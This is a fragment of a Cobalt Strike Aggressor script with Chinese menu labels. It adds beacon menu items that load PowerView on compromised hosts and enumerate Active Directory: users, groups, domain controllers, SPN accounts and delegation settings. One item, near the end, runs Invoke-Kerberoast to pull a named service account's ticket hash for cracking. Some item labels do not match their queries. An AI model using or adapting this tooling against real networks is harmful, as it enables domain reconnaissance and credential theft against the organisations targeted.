			blog($1, "\c9=========== 所有用户最后一个错误的密码尝试 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport12($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "get-aduser -filter * -prop lastbadpasswordattempt,badpwdcount | select name,lastbadpasswordattempt,badpwdcount | format-table -auto");
			}
		}


		item "查询某个组的用户" {
			blog($1, "\c9=========== 查询某个组的用户 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport12($1, $modulename);
			foreach $bid ($1){
				$dialog = dialog("查看指定组的所有用户", %(groupname => ""), &groupquery);
				dialog_description($dialog, "powerview查看指定组的所有用户");
				drow_text($dialog, "groupname", "组名: ");
				dbutton_action($dialog, "QUERY");
				dialog_show($dialog);
			}

		}

		item "域控机器查询" {
			blog($1, "\c9=========== 域控机器查询 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport12($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Get-ADDomainController -filter * | Select-Object HostName,IPv4Address,OperatingSystem | fl");
			}
		}

		item "获取域级别" {
			blog($1, "\c9=========== 获取域级别 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport12($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Get-ADDomain | Select-Object DNSRoot,PDCEmulator,DomainMode");
			}
		}

		item "寻找域内所有计算机和计算机对应的DNS" {
			blog($1, "\c9=========== 寻找域内所有计算机和计算机对应的DNS ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport12($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Get-ADComputer -Filter * -Property Name,IPv4Address | Select-Object DNSHostName,IPv4Address,SID | fl");
			}
		}

		item "寻找域内所有用户" {
			blog($1, "\c9=========== 寻找域内所有用户 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport12($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Get-ADUser -Filter * | Select-Object Name,ObjectClass,SID | fl");
			}
		}

		item "寻找kerberos服务用户" {
			blog($1, "\c9=========== 寻找kerberos服务用户 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport12($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Get-ADUser -filter {ServicePrincipalName -like \"*\"} -Property * | Select-Object Name,SID,ServicePrincipalNames | fl");
			}
		}

		item "无委派计算机查询" {
			blog($1, "\c9=========== 无委派计算机查询 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport12($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Get-ADComputer -Filter {TrustedForDelegation -eq \$True} -Properties * | select-object DNSHostName,IPv4Address,KerberosEncryptionType,whenCreated | fl");
			}
		}

		item "约束委派用户查询" {
			blog($1, "\c9=========== 约束委派用户查询 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport12($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Get-ADUser -Filter {TrustedToAuthForDelegation -eq \$True} -Properties * | select-object DistinguishedName,servicePrincipalName,msDS-AllowedToDelegateTo");
			}
		}

		item "域用户不要求kerberos验证身份查询" {
			blog($1, "\c9=========== 域用户不要求kerberos验证身份查询 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport12($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Get-ADUser -Filter {DoesNotRequirePreAuth -eq \$False} | Select-Object Name,SID | fl");
			}
		}

		item "获取指定SPN用户的hash" {
			blog($1, "\c9=========== 获取指定SPN用户的hash ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport12($1, $modulename);
			foreach $bid ($1){
				$dialog = dialog("获取指定SPN用户的hash", %(spnusername => ""), &spnuserquery);
				dialog_description($dialog, "powerview获取指定SPN用户的hash");
				drow_text($dialog, "spnusername", "用户: ");
				dbutton_action($dialog, "QUERY");
				dialog_show($dialog);
			}
		}
		sub moduleimport12{
			foreach $bid ($1){
				blog($bid, "导入脚本: $modulename");
				bpowershell_import($bid, script_resource($modulename));
			}
		}

		sub getuser{
			bpowershell($bid, "Get-ADUser -Identity \"$3['username']\"");
		}

		sub groupquery{
			bpowershell($bid, "Get-ADGroupMember \'$3['groupname']\' | Select-Object name,objectClass,distinguishedName,SID | fl");
		}

		sub spnuserquery{
			bpowershell($bid, "Invoke-Kerberoast -Identity \'$3['spnusername']\' | %{\$_.hash}");
		}		
	}

}
